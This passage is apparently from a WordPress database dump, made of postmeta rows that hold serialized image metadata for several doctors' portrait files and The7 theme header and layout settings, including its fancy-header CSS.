(31574,4078,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:393;s:6:\"height\";i:521;s:4:\"file\";s:20:\"2023/04/dr-helal.png\";s:8:\"filesize\";i:81175;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"dr-helal-226x300.png\";s:5:\"width\";i:226;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:93655;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"dr-helal-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36531;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(31575,4079,'_wp_attached_file','2023/04/dr-menghestab.png'),
(31576,4079,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:393;s:6:\"height\";i:521;s:4:\"file\";s:25:\"2023/04/dr-menghestab.png\";s:8:\"filesize\";i:81175;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"dr-menghestab-226x300.png\";s:5:\"width\";i:226;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:93655;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"dr-menghestab-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36531;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(31577,4080,'_wp_attached_file','2023/04/dr-menghestab2.png'),
(31578,4080,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:70;s:6:\"height\";i:95;s:4:\"file\";s:26:\"2023/04/dr-menghestab2.png\";s:8:\"filesize\";i:17489;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(31579,4077,'_thumbnail_id','4080'),
(31580,4077,'_edit_last','1'),
(31581,4077,'_dt_sidebar_position','disabled'),
(31582,4077,'_dt_sidebar_widgetarea_id','sidebar_1'),
(31583,4077,'_dt_sidebar_hide_on_mobile','0'),
(31584,4077,'_dt_footer_show','1'),
(31585,4077,'_dt_footer_widgetarea_id','sidebar_2'),
(31586,4077,'_dt_footer_hide_on_mobile','0'),
(31587,4077,'_dt_header_title','fancy'),
(31588,4077,'_dt_header_background','normal'),
(31589,4077,'_dt_header_background_below_slideshow','disabled'),
(31590,4077,'_dt_header_transparent_bg_color_scheme','light'),
(31591,4077,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(31592,4077,'_dt_header_transparent_top_bar_bg_opacity','25'),
(31593,4077,'_dt_header_transparent_bg_color','#000000'),
(31594,4077,'_dt_header_transparent_bg_opacity','50'),
(31595,4077,'_dt_header_disabled_background','normal'),
(31596,4077,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(31597,4077,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(31598,4077,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(31599,4077,'_dt_header_disabled_transparent_bg_color','#000000'),
(31600,4077,'_dt_header_disabled_transparent_bg_opacity','50'),
(31601,4077,'_dt_page_overrides_top_margin',''),
(31602,4077,'_dt_page_overrides_right_margin',''),
(31603,4077,'_dt_page_overrides_bottom_margin',''),
(31604,4077,'_dt_page_overrides_left_margin',''),
(31605,4077,'_dt_mobile_page_padding_top',''),
(31606,4077,'_dt_mobile_page_padding_right',''),
(31607,4077,'_dt_mobile_page_padding_bottom',''),
(31608,4077,'_dt_mobile_page_padding_left',''),
(31609,4077,'_dt_fancy_header_layout_heading',''),
(31610,4077,'_dt_fancy_header_title_aligment','center'),
(31611,4077,'_dt_fancy_header_height','300'),
(31612,4077,'_dt_fancy_header_padding-top','0px'),
(31613,4077,'_dt_fancy_header_padding-bottom','0px'),
(31614,4077,'_dt_fancy_header_breadcrumbs_heading',''),
(31615,4077,'_dt_fancy_header_breadcrumbs','disabled'),
(31616,4077,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(31617,4077,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(31618,4077,'_dt_fancy_header_title_heading',''),
(31619,4077,'_dt_fancy_header_title_mode','generic'),
(31620,4077,'_dt_fancy_header_title',''),
(31621,4077,'_dt_fancy_header_title_font_size','30'),
(31622,4077,'_dt_fancy_header_title_line_height','36'),
(31623,4077,'_dt_fancy_header_text_transform','none'),
(31624,4077,'_dt_fancy_header_title_color_mode','color'),
(31625,4077,'_dt_fancy_header_title_color','#ffffff'),
(31626,4077,'_dt_fancy_header_subtitle_heading',''),
(31627,4077,'_dt_fancy_header_subtitle',''),
(31628,4077,'_dt_fancy_header_subtitle_font_size','18'),
(31629,4077,'_dt_fancy_header_subtitle_line_height','26'),
(31630,4077,'_dt_fancy_header_subtitle_text_transform','none'),
(31631,4077,'_dt_fancy_header_subtitle_color_mode','color'),
(31632,4077,'_dt_fancy_header_subtitle_color','#ffffff'),
(31633,4077,'_dt_fancy_header_bg_heading',''),
(31634,4077,'_dt_fancy_header_bg_color','#222222'),
(31635,4077,'_dt_fancy_header_bg_image_origin','custom'),
(31636,4077,'_dt_fancy_header_bg_image','a:0:{}'),
(31637,4077,'_dt_fancy_header_bg_repeat','no-repeat'),
(31638,4077,'_dt_fancy_header_bg_position_x','center'),
(31639,4077,'_dt_fancy_header_bg_position_y','center'),
(31640,4077,'_dt_fancy_header_bg_fullscreen','1'),
(31641,4077,'_dt_fancy_header_bg_overlay','0'),
(31642,4077,'_dt_fancy_header_overlay_color','#000'),
(31643,4077,'_dt_fancy_header_bg_overlay_opacity','50'),
(31644,4077,'_dt_fancy_header_scroll_effect','default'),
(31645,4077,'_dt_fancy_header_bg_parallax','0.5'),
(31646,4077,'_dt_fancy_header_responsiveness_heading',''),
(31647,4077,'_dt_fancy_header_responsiveness','enabled'),
(31648,4077,'_dt_fancy_header_responsiveness_switch','778px'),
(31649,4077,'_dt_fancy_header_responsive_height','70'),
(31650,4077,'_dt_fancy_header_responsive_font_size','30'),
(31651,4077,'_dt_fancy_header_responsive_title_line_height','38'),
(31652,4077,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(31653,4077,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(31654,4077,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(31655,4077,'_dt_teammate_options_go_to_single','1'),
(31656,4077,'_dt_teammate_options_position',''),
(31657,4077,'_dt_teammate_options_website',''),
(31658,4077,'_dt_teammate_options_mail',''),
(31659,4077,'_dt_teammate_options_facebook',''),
(31660,4077,'_dt_teammate_options_twitter',''),
(31661,4077,'_dt_teammate_options_dribbble',''),
(31662,4077,'_dt_teammate_options_you-tube',''),
(31663,4077,'_dt_teammate_options_rss',''),
(31664,4077,'_dt_teammate_options_delicious',''),
(31665,4077,'_dt_teammate_options_flickr',''),
(31666,4077,'_dt_teammate_options_lastfm',''),
(31667,4077,'_dt_teammate_options_linkedin',''),
(31668,4077,'_dt_teammate_options_vimeo',''),
(31669,4077,'_dt_teammate_options_tumbler',''),
(31670,4077,'_dt_teammate_options_pinterest',''),
(31671,4077,'_dt_teammate_options_devian',''),
(31672,4077,'_dt_teammate_options_skype',''),
(31673,4077,'_dt_teammate_options_github',''),
(31674,4077,'_dt_teammate_options_instagram',''),
(31675,4077,'_dt_teammate_options_stumbleupon',''),
(31676,4077,'_dt_teammate_options_behance',''),
(31677,4077,'_dt_teammate_options_px-500',''),
(31678,4077,'_dt_teammate_options_tripedvisor',''),
(31679,4077,'_dt_teammate_options_vk',''),
(31680,4077,'_dt_teammate_options_foursquare',''),
(31681,4077,'_dt_teammate_options_xing',''),
(31682,4077,'_dt_teammate_options_weibo',''),
(31683,4077,'_dt_teammate_options_odnoklassniki',''),
(31684,4077,'_dt_teammate_options_research-gate',''),
(31685,4077,'_dt_teammate_options_yelp',''),
(31686,4077,'_dt_teammate_options_blogger',''),
(31687,4077,'_dt_teammate_options_soundcloud',''),
(31688,4077,'_dt_teammate_options_viber',''),
(31689,4077,'_dt_teammate_options_whatsapp',''),
(31690,4077,'_dt_teammate_options_reddit',''),
(31691,4077,'_dt_teammate_options_snapchat',''),
(31692,4077,'_dt_teammate_options_telegram',''),
(31693,4077,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(31694,4081,'_edit_lock','1681945574:1'),
(31695,4082,'_wp_attached_file','2023/04/Yahya_Photo_Enhanced3.png'),
(31696,4082,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:729;s:6:\"height\";i:771;s:4:\"file\";s:33:\"2023/04/Yahya_Photo_Enhanced3.png\";s:8:\"filesize\";i:914155;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"Yahya_Photo_Enhanced3-284x300.png\";s:5:\"width\";i:284;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:170472;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"Yahya_Photo_Enhanced3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:52604;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:33:\"Yahya_Photo_Enhanced3-500x529.png\";s:5:\"width\";i:500;s:6:\"height\";i:529;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:444150;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(31697,4081,'_thumbnail_id','4082'),
(31698,4081,'_edit_last','1'),
(31699,4081,'_dt_sidebar_position','disabled'),
(31700,4081,'_dt_sidebar_widgetarea_id','sidebar_1'),
(31701,4081,'_dt_sidebar_hide_on_mobile','0'),
(31702,4081,'_dt_footer_show','1'),
(31703,4081,'_dt_footer_widgetarea_id','sidebar_2'),
(31704,4081,'_dt_footer_hide_on_mobile','0'),
(31705,4081,'_dt_header_title','fancy'),
(31706,4081,'_dt_header_background','normal'),
(31707,4081,'_dt_header_background_below_slideshow','disabled'),
(31708,4081,'_dt_header_transparent_bg_color_scheme','light'),
(31709,4081,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(31710,4081,'_dt_header_transparent_top_bar_bg_opacity','25'),
(31711,4081,'_dt_header_transparent_bg_color','#000000'),
(31712,4081,'_dt_header_transparent_bg_opacity','50'),
(31713,4081,'_dt_header_disabled_background','normal'),
(31714,4081,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(31715,4081,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(31716,4081,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(31717,4081,'_dt_header_disabled_transparent_bg_color','#000000'),
(31718,4081,'_dt_header_disabled_transparent_bg_opacity','50'),
(31719,4081,'_dt_page_overrides_top_margin',''),
(31720,4081,'_dt_page_overrides_right_margin',''),
(31721,4081,'_dt_page_overrides_bottom_margin',''),
(31722,4081,'_dt_page_overrides_left_margin',''),
(31723,4081,'_dt_mobile_page_padding_top',''),
(31724,4081,'_dt_mobile_page_padding_right',''),
(31725,4081,'_dt_mobile_page_padding_bottom',''),
(31726,4081,'_dt_mobile_page_padding_left',''),
(31727,4081,'_dt_fancy_header_layout_heading',''),
(31728,4081,'_dt_fancy_header_title_aligment','center'),
(31729,4081,'_dt_fancy_header_height','300'),
(31730,4081,'_dt_fancy_header_padding-top','0px'),
(31731,4081,'_dt_fancy_header_padding-bottom','0px'),
(31732,4081,'_dt_fancy_header_breadcrumbs_heading',''),
(31733,4081,'_dt_fancy_header_breadcrumbs','disabled'),
(31734,4081,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(31735,4081,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(31736,4081,'_dt_fancy_header_title_heading',''),
(31737,4081,'_dt_fancy_header_title_mode','generic'),
(31738,4081,'_dt_fancy_header_title',''),
(31739,4081,'_dt_fancy_header_title_font_size','30'),
(31740,4081,'_dt_fancy_header_title_line_height','36'),
(31741,4081,'_dt_fancy_header_text_transform','none'),
(31742,4081,'_dt_fancy_header_title_color_mode','color'),
(31743,4081,'_dt_fancy_header_title_color','#ffffff'),
(31744,4081,'_dt_fancy_header_subtitle_heading',''),
(31745,4081,'_dt_fancy_header_subtitle',''),
(31746,4081,'_dt_fancy_header_subtitle_font_size','18'),
(31747,4081,'_dt_fancy_header_subtitle_line_height','26'),
(31748,4081,'_dt_fancy_header_subtitle_text_transform','none'),
(31749,4081,'_dt_fancy_header_subtitle_color_mode','color'),
(31750,4081,'_dt_fancy_header_subtitle_color','#ffffff'),
(31751,4081,'_dt_fancy_header_bg_heading',''),
(31752,4081,'_dt_fancy_header_bg_color','#222222'),
(31753,4081,'_dt_fancy_header_bg_image_origin','custom'),
(31754,4081,'_dt_fancy_header_bg_image','a:0:{}'),
(31755,4081,'_dt_fancy_header_bg_repeat','no-repeat'),
(31756,4081,'_dt_fancy_header_bg_position_x','center'),
(31757,4081,'_dt_fancy_header_bg_position_y','center'),
(31758,4081,'_dt_fancy_header_bg_fullscreen','1'),
(31759,4081,'_dt_fancy_header_bg_overlay','0'),
(31760,4081,'_dt_fancy_header_overlay_color','#000'),
(31761,4081,'_dt_fancy_header_bg_overlay_opacity','50'),
(31762,4081,'_dt_fancy_header_scroll_effect','default'),
(31763,4081,'_dt_fancy_header_bg_parallax','0.5'),
(31764,4081,'_dt_fancy_header_responsiveness_heading',''),
(31765,4081,'_dt_fancy_header_responsiveness','enabled'),
(31766,4081,'_dt_fancy_header_responsiveness_switch','778px'),
(31767,4081,'_dt_fancy_header_responsive_height','70'),
(31768,4081,'_dt_fancy_header_responsive_font_size','30'),
(31769,4081,'_dt_fancy_header_responsive_title_line_height','38'),
(31770,4081,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(31771,4081,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(31772,4081,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(31773,4081,'_dt_teammate_options_go_to_single','1'),
(31774,4081,'_dt_teammate_options_position',''),
(31775,4081,'_dt_teammate_options_website',''),
(31776,4081,'_dt_teammate_options_mail',''),
(31777,4081,'_dt_teammate_options_facebook',''),
(31778,4081,'_dt_teammate_options_twitter',''),
(31779,4081,'_dt_teammate_options_dribbble',''),
(31780,4081,'_dt_teammate_options_you-tube',''),
(31781,4081,'_dt_teammate_options_rss',''),
(31782,4081,'_dt_teammate_options_delicious',''),
(31783,4081,'_dt_teammate_options_flickr',''),
(31784,4081,'_dt_teammate_options_lastfm',''),
(31785,4081,'_dt_teammate_options_linkedin',''),
(31786,4081,'_dt_teammate_options_vimeo',''),
(31787,4081,'_dt_teammate_options_tumbler',''),
(31788,4081,'_dt_teammate_options_pinterest',''),
(31789,4081,'_dt_teammate_options_devian',''),
(31790,4081,'_dt_teammate_options_skype',''),
(31791,4081,'_dt_teammate_options_github',''),
(31792,4081,'_dt_teammate_options_instagram',''),
(31793,4081,'_dt_teammate_options_stumbleupon',''),
(31794,4081,'_dt_teammate_options_behance',''),
(31795,4081,'_dt_teammate_options_px-500',''),
(31796,4081,'_dt_teammate_options_tripedvisor',''),
(31797,4081,'_dt_teammate_options_vk',''),
(31798,4081,'_dt_teammate_options_foursquare',''),
(31799,4081,'_dt_teammate_options_xing',''),
(31800,4081,'_dt_teammate_options_weibo',''),
(31801,4081,'_dt_teammate_options_odnoklassniki',''),
(31802,4081,'_dt_teammate_options_research-gate',''),
(31803,4081,'_dt_teammate_options_yelp',''),
(31804,4081,'_dt_teammate_options_blogger',''),
(31805,4081,'_dt_teammate_options_soundcloud',''),
(31806,4081,'_dt_teammate_options_viber',''),
(31807,4081,'_dt_teammate_options_whatsapp',''),
(31808,4081,'_dt_teammate_options_reddit',''),
(31809,4081,'_dt_teammate_options_snapchat',''),
(31810,4081,'_dt_teammate_options_telegram',''),
(31811,4081,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(31812,4083,'_edit_lock','1681946643:1'),
(31813,4084,'_wp_attached_file','2023/04/dr-yasser-fouad1.png'),
(31814,4084,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:731;s:6:\"height\";i:587;s:4:\"file\";s:28:\"2023/04/dr-yasser-fouad1.png\";s:8:\"filesize\";i:188068;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"dr-yasser-fouad1-300x241.png\";s:5:\"width\";i:300;s:6:\"height\";i:241;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:90897;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"dr-yasser-fouad1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31369;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:28:\"dr-yasser-fouad1-500x402.png\";s:5:\"width\";i:500;s:6:\"height\";i:402;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:228334;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(31815,4085,'_wp_attached_file','2023/04/dr-yasser-fouad2.png'),
(31816,4085,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:729;s:6:\"height\";i:364;s:4:\"file\";s:28:\"2023/04/dr-yasser-fouad2.png\";s:8:\"filesize\";i:68398;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"dr-yasser-fouad2-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:54986;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"dr-yasser-fouad2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:28590;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:28:\"dr-yasser-fouad2-500x250.png\";s:5:\"width\";i:500;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:136784;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(31817,4086,'_wp_attached_file','2023/04/dr-yasser-fouad.png'),
(31818,4086,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:238;s:6:\"height\";i:267;s:4:\"file\";s:27:\"2023/04/dr-yasser-fouad.png\";s:8:\"filesize\";i:82731;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"dr-yasser-fouad-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:34968;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(31819,4083,'_thumbnail_id','4086'),
(31820,4083,'_edit_last','1'),
(31821,4083,'_dt_sidebar_position','disabled'),
(31822,4083,'_dt_sidebar_widgetarea_id','sidebar_1'),
(31823,4083,'_dt_sidebar_hide_on_mobile','0'),
(31824,4083,'_dt_footer_show','1'),
(31825,4083,'_dt_footer_widgetarea_id','sidebar_2'),
(31826,4083,'_dt_footer_hide_on_mobile','0'),
(31827,4083,'_dt_header_title','fancy'),
(31828,4083,'_dt_header_background','normal'),
(31829,4083,'_dt_header_background_below_slideshow','disabled'),
(31830,4083,'_dt_header_transparent_bg_color_scheme','light'),
(31831,4083,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(31832,4083,'_dt_header_transparent_top_bar_bg_opacity','25'),
(31833,4083,'_dt_header_transparent_bg_color','#000000'),
(31834,4083,'_dt_header_transparent_bg_opacity','50'),
(31835,4083,'_dt_header_disabled_background','normal'),
(31836,4083,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(31837,4083,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(31838,4083,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(31839,4083,'_dt_header_disabled_transparent_bg_color','#000000'),
(31840,4083,'_dt_header_disabled_transparent_bg_opacity','50'),
(31841,4083,'_dt_page_overrides_top_margin',''),
(31842,4083,'_dt_page_overrides_right_margin',''),
(31843,4083,'_dt_page_overrides_bottom_margin',''),
(31844,4083,'_dt_page_overrides_left_margin',''),
(31845,4083,'_dt_mobile_page_padding_top',''),
(31846,4083,'_dt_mobile_page_padding_right',''),
(31847,4083,'_dt_mobile_page_padding_bottom',''),
(31848,4083,'_dt_mobile_page_padding_left',''),
(31849,4083,'_dt_fancy_header_layout_heading',''),
(31850,4083,'_dt_fancy_header_title_aligment','center'),
(31851,4083,'_dt_fancy_header_height','300'),
(31852,4083,'_dt_fancy_header_padding-top','0px'),
(31853,4083,'_dt_fancy_header_padding-bottom','0px'),
(31854,4083,'_dt_fancy_header_breadcrumbs_heading',''),
(31855,4083,'_dt_fancy_header_breadcrumbs','disabled'),
(31856,4083,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(31857,4083,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(31858,4083,'_dt_fancy_header_title_heading',''),
(31859,4083,'_dt_fancy_header_title_mode','generic'),
(31860,4083,'_dt_fancy_header_title',''),
(31861,4083,'_dt_fancy_header_title_font_size','30'),
(31862,4083,'_dt_fancy_header_title_line_height','36'),
(31863,4083,'_dt_fancy_header_text_transform','none'),
(31864,4083,'_dt_fancy_header_title_color_mode','color'),
(31865,4083,'_dt_fancy_header_title_color','#ffffff'),
(31866,4083,'_dt_fancy_header_subtitle_heading',''),
(31867,4083,'_dt_fancy_header_subtitle',''),
(31868,4083,'_dt_fancy_header_subtitle_font_size','18'),
(31869,4083,'_dt_fancy_header_subtitle_line_height','26'),
(31870,4083,'_dt_fancy_header_subtitle_text_transform','none'),
(31871,4083,'_dt_fancy_header_subtitle_color_mode','color'),
(31872,4083,'_dt_fancy_header_subtitle_color','#ffffff'),
(31873,4083,'_dt_fancy_header_bg_heading',''),
(31874,4083,'_dt_fancy_header_bg_color','#222222'),
(31875,4083,'_dt_fancy_header_bg_image_origin','custom'),
(31876,4083,'_dt_fancy_header_bg_image','a:0:{}'),
(31877,4083,'_dt_fancy_header_bg_repeat','no-repeat'),
(31878,4083,'_dt_fancy_header_bg_position_x','center'),
(31879,4083,'_dt_fancy_header_bg_position_y','center'),
(31880,4083,'_dt_fancy_header_bg_fullscreen','1'),
(31881,4083,'_dt_fancy_header_bg_overlay','0'),
(31882,4083,'_dt_fancy_header_overlay_color','#000'),
(31883,4083,'_dt_fancy_header_bg_overlay_opacity','50'),
(31884,4083,'_dt_fancy_header_scroll_effect','default'),
(31885,4083,'_dt_fancy_header_bg_parallax','0.5'),
(31886,4083,'_dt_fancy_header_responsiveness_heading',''),
(31887,4083,'_dt_fancy_header_responsiveness','enabled'),
(31888,4083,'_dt_fancy_header_responsiveness_switch','778px'),
